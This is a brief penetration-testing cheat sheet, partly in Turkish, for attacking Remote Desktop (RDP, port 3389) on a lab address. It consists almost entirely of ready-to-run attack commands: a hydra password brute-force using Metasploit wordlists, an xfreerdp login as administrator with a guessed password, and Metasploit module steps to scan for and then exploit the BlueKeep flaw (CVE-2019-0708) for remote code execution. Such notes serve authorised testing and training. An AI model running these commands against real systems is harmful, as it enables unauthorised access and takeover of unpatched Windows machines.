RDP - 3389

Brute Force

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://192.168.1.3 -s 3389

Bağlantı

remmina
xfreerdp /u:administrator /p:password123 /v:192.168.1.3:3389

CVE-2019-0708 (BlueKeep)

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 192.168.1.3
set RPORT 3389
run
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.3
set RPORT 3389
exploit

Last updated